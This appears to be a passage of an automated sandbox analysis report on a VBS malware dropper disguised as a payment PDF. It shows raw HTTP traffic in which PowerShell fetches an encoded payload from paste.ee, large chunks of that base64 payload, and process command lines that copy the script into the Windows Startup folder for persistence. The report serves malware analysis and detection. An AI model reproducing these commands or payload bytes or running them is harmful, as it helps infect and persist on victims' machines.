                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                  Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                  Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                  Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                  2024-10-07 12:52:24 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                  Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549761188.114.97.34433836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-07 12:52:26 UTC67OUTGET /d/fb4UJ/0 HTTP/1.1
                                                                                                  Host: paste.ee
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-07 12:52:27 UTC1204INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 07 Oct 2024 12:52:27 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=2592000
                                                                                                  strict-transport-security: max-age=63072000
                                                                                                  x-frame-options: DENY
                                                                                                  x-content-type-options: nosniff
                                                                                                  x-xss-protection: 1; mode=block
                                                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGsVUIBtBanbJCGdng6IJH9k6hvpMddAatdkQVwXp9V8UrqUAsHAH217jO5WVItFyhC0Ea2d9XT%2BrGVVgN4lq0kd88ybIZ%2FrBj08Uv77Yx19%2FtHu4LMh2TUfxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8cee0743ed5fc457-EWR
                                                                                                  2024-10-07 12:52:27 UTC165INData Raw: 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 59 79 44 65 38 77 46 50 38 77 44 48 37 67 2f 4f 73 76 44 7a 37 41 36 4f 45 75 44 5a 37 51 30 4f 67 73 44 41 36 77 74 4f 38 71 44 6e
                                                                                                  Data Ascii: f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPYyDe8wFP8wDH7g/OsvDz7A6OEuDZ7Q0OgsDA6wtO8qDn
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 36 77 6e 4f 63 70 44 4e 36 67 68 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 38 35 77 65 4f 6f 6e 44 6b 7a 51 79 4d 67 49 44 6c 79 41 70 4d 30 4a 44 63 79 77 6d 4d 67 4a 44 53 79 67 6a 4d 6f 49 44 47 79 67 51 4d 59 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 30 47 44 73 78 77 61 4d 6f 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 68 78 41 59 4d 38 46 44 65 78 67 57 4d 6b 46 44 59 41 41 41 41 4d 43 67 42 67 44 41 41 41 6f 44 56 36 41 6b 4f 34 6f 44 4a 36 77 68 4f 55 6f 44 44 36 67 67 4f 41 6b 44 37 35 51 65 4f 51 6e 44 79 35 41 63 4f 34 6d 44 74 35 41 62 4f 73 6d 44 71 35 41 61 4f 63 6d 44 6c 35 41 59 4f 34 6c 44 5a 35 77 56 4f 55 6c 44 54 35 67 53 4f 67 6b 44 47 35 51 42 4f 34 6a 44 32 34 51 4e 4f 34 69 44 6d 34 67 48 4f 59 68 44 4f 34 67 78 4e 34 66 44
                                                                                                  Data Ascii: 6wnOcpDN6ghOAkD/5gfO0nD85weOonDkzQyMgIDlyApM0JDcywmMgJDSygjMoIDGygQMYHDyxQcMAHDvxgbM0GDsxwaMoGDnxgZMUGDkxwYMIGDhxAYM8FDexgWMkFDYAAAAMCgBgDAAAoDV6AkO4oDJ6whOUoDD6ggOAkD75QeOQnDy5AcO4mDt5AbOsmDq5AaOcmDl5AYO4lDZ5wVOUlDT5gSOgkDG5QBO4jD24QNO4iDm4gHOYhDO4gxN4fD
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 41 69 4d 63 49 44 47 79 51 68 4d 51 49 44 44 79 67 67 4d 45 49 44 41 41 41 41 41 41 43 67 42 41 42 77 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61 78 41 57 4d 59 46 44 55 78 67 55 4d 41 46 44 4f 78 41 54 4d 6f 45 44 49 78 67 52 4d 51 45 44 43 78 41 41 4d 34 44 44 38 77 67 4f 4d 67 44 44 32 77 41 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44 71
                                                                                                  Data Ascii: AiMcIDGyQhMQIDDyggMEIDAAAAAACgBABwM4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDaxAWMYFDUxgUMAFDOxATMoEDIxgRMQEDCxAAM4DD8wgOMgDD2wANMIDDwwgLMwCDq
                                                                                                  2024-10-07 12:52:27 UTC1071INData Raw: 6e 4d 6b 4a 44 57 79 77 6b 4d 41 4a 44 4e 79 67 69 4d 63 49 44 45 79 51 51 4d 34 48 44 37 78 41 65 4d 51 48 44 78 78 67 62 4d 73 47 44 6f 78 51 5a 4d 49 47 44 66 78 41 58 4d 6b 46 44 57 78 77 55 4d 41 46 44 4e 78 67 53 4d 63 45 44 45 78 51 41 4d 34 44 44 37 77 41 4f 4d 55 44 44 79 77 77 4c 4d 77 43 44 70 77 67 4a 4d 4d 43 44 67 77 51 48 4d 6f 42 44 58 77 41 46 4d 45 42 44 4f 77 77 43 4d 67 41 44 46 77 67 41 41 41 4d 41 67 41 55 41 30 41 38 44 2f 2f 41 2f 50 6b 2f 44 32 2f 77 38 50 41 2f 44 74 2f 67 36 50 63 2b 44 6b 2f 51 34 50 34 39 44 62 2f 41 32 50 55 39 44 53 2f 77 7a 50 77 38 44 4a 2f 67 78 50 4d 38 44 41 2b 51 76 50 6f 37 44 33 2b 41 64 4e 6b 56 44 59 31 77 56 4e 59 4e 6a 39 7a 49 2f 4d 75 50 6a 36 41 41 41 41 4d 42 51 42 41 44 41 41 41 77 44 62 38
                                                                                                  Data Ascii: nMkJDWywkMAJDNygiMcIDEyQQM4HD7xAeMQHDxxgbMsGDoxQZMIGDfxAXMkFDWxwUMAFDNxgSMcEDExQAM4DD7wAOMUDDywwLMwCDpwgJMMCDgwQHMoBDXwAFMEBDOwwCMgADFwgAAAMAgAUA0A8D//A/Pk/D2/w8PA/Dt/g6Pc+Dk/Q4P49Db/A2PU9DS/wzPw8DJ/gxPM8DA+QvPo7D3+AdNkVDY1wVNYNj9zI/MuPj6AAAAMBQBADAAAwDb8
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 32 30 30 30 0d 0a 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61
                                                                                                  Data Ascii: 2000U0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDa
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 67 50 38 37 44 39 2b 77 75 50 6b 37 44 33 2b 51 74 50 4d 37 44 78 2b 77 72 50 30 36 44 72 2b 51 71 50 63 36 44 6c 2b 77 6f 50 45 36 44 66 2b 51 6e 50 73 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 33 77 32 4e 6f 64 44 5a 33 41 32 4e 63 64 44 57 33 51 31 4e 51 64 44 54 33 67 30 4e 45 64 44 51 33 77 7a 4e 34 63 44 4b 33 51 79 4e 67 63 44 48 33 67 78 4e 55 63 44 45 33 77 77 4e 49 63 44 42 33 41 67 4e 38 62 44 2b 32 51 76 4e 77 62 44 37 32 67 75 4e 6b 62 44 34 32 77 74 4e 59 62 44 31 32 41 74 4e 4d 62 44 79 32 51 73 4e 6f 61 44 70 32 41 71 4e 4d 61 44 69 32 51 6f 4e 41 61 44 66 32 67 6e 4e 30 5a 44 63 31 77 65 4e 6f 58 44 35 31 41 64 4e 4d 58 44 79 31 51 63 4e 41 58 44 76 31 67 62 4e 30 57 44 71 31
                                                                                                  Data Ascii: gP87D9+wuPk7D3+QtPM7Dx+wrP06Dr+QqPc6Dl+woPE6Df+QnPs5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB3w2NodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDK3QyNgcDH3gxNUcDE3wwNIcDB3AgN8bD+2QvNwbD72guNkbD42wtNYbD12AtNMbDy2QsNoaDp2AqNMaDi2QoNAaDf2gnN0ZDc1weNoXD51AdNMXDy1QcNAXDv1gbN0WDq1
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 4e 56 53 54 76 30 41 33 4d 32 50 44 35 7a 73 31 4d 56 45 6a 30 41 41 41 41 41 42 41 42 67 44 41 41 41 34 54 46 2b 30 67 50 46 30 54 2f 39 59 50 50 78 73 54 39 37 4d 2b 4f 52 76 7a 76 37 30 71 4f 34 6a 7a 44 33 41 39 4e 2b 65 44 72 33 6f 35 4e 49 65 6a 64 33 51 32 4e 53 64 44 51 33 34 79 4e 63 63 6a 43 32 67 76 4e 30 61 44 6f 32 41 6c 4e 4a 5a 6a 44 31 67 66 4e 47 58 6a 75 31 73 59 4e 2b 56 44 51 31 38 52 4e 56 55 6a 41 30 67 4e 4e 50 54 44 79 30 59 49 4e 2f 52 54 52 30 38 43 4e 59 51 54 45 7a 67 2b 4d 67 50 7a 77 7a 55 37 4d 6d 4f 6a 5a 7a 77 55 4d 30 45 6a 42 77 6b 4e 4d 48 44 7a 72 77 59 4b 4d 70 41 41 41 41 67 49 41 45 41 4e 41 2f 49 32 50 4c 39 6a 50 2f 45 7a 50 6b 34 7a 34 2b 59 74 50 50 37 44 79 2b 45 73 50 45 35 54 4f 2b 73 52 50 30 33 6a 30 39 63
                                                                                                  Data Ascii: NVSTv0A3M2PD5zs1MVEj0AAAAABABgDAAA4TF+0gPF0T/9YPPxsT97M+ORvzv70qO4jzD3A9N+eDr3o5NIejd3Q2NSdDQ34yNccjC2gvN0aDo2AlNJZjD1gfNGXju1sYN+VDQ18RNVUjA0gNNPTDy0YIN/RTR08CNYQTEzg+MgPzwzU7MmOjZzwUM0EjBwkNMHDzrwYKMpAAAAgIAEANA/I2PL9jP/EzPk4z4+YtPP7Dy+EsPE5TO+sRP03j09c
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 39 59 44 47 32 38 51 4e 72 58 7a 34 31 51 61 4e 63 57 7a 57 31 41 46 4e 39 54 7a 39 30 41 4a 4e 49 53 6a 65 30 49 48 4e 70 52 44 59 30 67 46 4e 51 52 44 53 30 30 44 4e 72 51 7a 49 30 63 42 4e 50 51 6a 42 7a 30 2f 4d 31 50 54 37 7a 55 2b 4d 64 50 44 30 7a 51 38 4d 38 4f 6a 66 7a 49 31 4d 6d 49 7a 2f 79 6b 76 4d 7a 4c 54 37 79 55 75 4d 68 4c 6a 31 79 63 73 4d 37 4b 6a 71 79 34 70 4d 4d 4b 44 61 79 6b 6c 4d 4c 4a 54 4b 79 51 69 4d 66 49 7a 43 79 41 51 4d 72 48 6a 33 78 4d 64 4d 6b 47 6a 68 78 45 59 4d 38 46 54 63 78 55 56 4d 78 41 6a 2f 77 6b 50 4d 30 44 54 36 77 67 4c 4d 55 43 7a 6a 77 6f 49 4d 2f 42 7a 59 77 77 45 4d 78 41 44 4c 77 63 43 4d 63 41 44 41 41 41 51 41 45 41 41 42 67 42 77 50 77 2f 7a 7a 2f 6f 38 50 46 2f 6a 75 2f 67 35 50 47 2b 44 61 2f 4d 32
                                                                                                  Data Ascii: 9YDG28QNrXz41QaNcWzW1AFN9Tz90AJNISje0IHNpRDY0gFNQRDS00DNrQzI0cBNPQjBz0/M1PT7zU+MdPD0zQ8M8OjfzI1MmIz/ykvMzLT7yUuMhLj1ycsM7Kjqy4pMMKDayklMLJTKyQiMfIzCyAQMrHj3xMdMkGjhxEYM8FTcxUVMxAj/wkPM0DT6wgLMUCzjwoIM/BzYwwEMxADLwcCMcADAAAQAEAABgBwPw/zz/o8PF/ju/g5PG+Da/M2
                                                                                                  2024-10-07 12:52:27 UTC1369INData Raw: 70 54 47 35 59 4d 4f 35 65 7a 32 33 67 37 4e 49 61 7a 64 41 41 41 41 6f 41 77 41 77 44 41 41 41 38 54 34 37 6b 6b 4f 69 6d 6a 73 35 77 59 4f 76 68 54 75 34 30 4a 4f 45 68 6a 4b 78 73 65 4d 49 47 6a 4e 78 49 54 4d 75 45 6a 4b 78 59 53 4d 69 45 6a 48 78 6f 52 4d 57 45 6a 45 78 34 51 4d 4b 41 6a 37 41 41 41 41 38 41 77 41 67 44 67 50 7a 4d 54 49 7a 30 78 4d 5a 4d 54 46 7a 45 78 4d 4e 4d 54 43 7a 55 67 4d 35 4a 54 41 78 30 66 4d 35 48 54 39 78 45 66 4d 74 48 54 36 78 55 65 4d 63 42 54 35 77 45 4f 4d 64 44 54 32 77 55 4e 4d 52 44 54 7a 77 6b 4d 4d 30 41 41 41 41 41 45 41 44 41 4e 41 2f 30 37 50 35 2b 54 74 2f 45 37 50 74 2b 54 71 2f 55 36 50 68 2b 44 47 39 51 59 50 79 31 44 55 39 73 54 50 62 30 54 43 37 77 65 4e 72 4e 7a 37 79 4d 58 4d 78 44 41 41 41 41 44 41
                                                                                                  Data Ascii: pTG5YMO5ez23g7NIazdAAAAoAwAwDAAA8T47kkOimjs5wYOvhTu40JOEhjKxseMIGjNxITMuEjKxYSMiEjHxoRMWEjEx4QMKAj7AAAA8AwAgDgPzMTIz0xMZMTFzExMNMTCzUgM5JTAx0fM5HT9xEfMtHT6xUeMcBT5wEOMdDT2wUNMRDTzwkMM0AAAAAEADANA/07P5+Tt/E7Pt+Tq/U6Ph+DG9QYPy1DU9sTPb0TC7weNrNz7yMXMxDAAAADA
                                                                                                  2024-10-07 12:52:27 UTC1355INData Raw: 7a 69 39 55 59 50 41 32 6a 65 39 4d 58 50 75 31 54 61 39 4d 57 50 64 31 7a 56 39 49 56 50 4d 31 6a 52 39 41 55 50 37 30 54 4e 39 38 53 50 70 30 44 4a 39 34 52 50 59 30 6a 45 39 30 51 50 48 30 54 41 38 73 50 50 32 7a 44 38 38 6f 4f 50 6b 7a 7a 33 38 6b 4e 50 54 7a 54 7a 38 67 4d 50 43 7a 44 76 38 59 4c 50 78 79 7a 71 38 55 4b 50 66 79 6a 6d 38 51 4a 50 4f 79 44 69 38 4d 49 50 39 78 7a 64 38 45 48 50 73 78 6a 5a 38 41 47 50 61 78 54 56 38 38 45 50 4a 78 7a 51 38 34 44 50 34 77 6a 4d 38 77 43 50 6e 77 54 49 38 6f 42 50 54 77 54 44 37 67 71 4f 42 72 54 4e 35 45 66 4f 6b 6e 54 33 35 63 64 4f 52 6e 44 77 35 4d 61 4f 4f 6d 44 69 35 41 59 4f 72 6c 6a 58 35 49 56 4f 45 6c 7a 48 32 30 71 4e 6d 61 6a 6d 32 49 6f 4e 4b 55 6a 2f 31 6b 56 4e 54 52 6a 2b 30 38 4f 4e 68
                                                                                                  Data Ascii: zi9UYPA2je9MXPu1Ta9MWPd1zV9IVPM1jR9AUP70TN98SPp0DJ94RPY0jE90QPH0TA8sPP2zD88oOPkzz38kNPTzTz8gMPCzDv8YLPxyzq8UKPfyjm8QJPOyDi8MIP9xzd8EHPsxjZ8AGPaxTV88EPJxzQ84DP4wjM8wCPnwTI8oBPTwTD7gqOBrTN5EfOknT35cdORnDw5MaOOmDi5AYOrljX5IVOElzH20qNmajm2IoNKUj/1kVNTRj+08ONh


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:08:52:09
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs"
                                                                                                  Imagebase:0x7ff63ca40000
                                                                                                  File size:170'496 bytes
                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:08:52:09
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                                                                                                  Imagebase:0x7ff691160000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:08:52:09
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:08:52:09
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:ping 127.0.0.1 -n 10
                                                                                                  Imagebase:0x7ff7fd8a0000
                                                                                                  File size:22'528 bytes
                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:08:52:19
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:08:52:21
                                                                                                  Start date:07/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
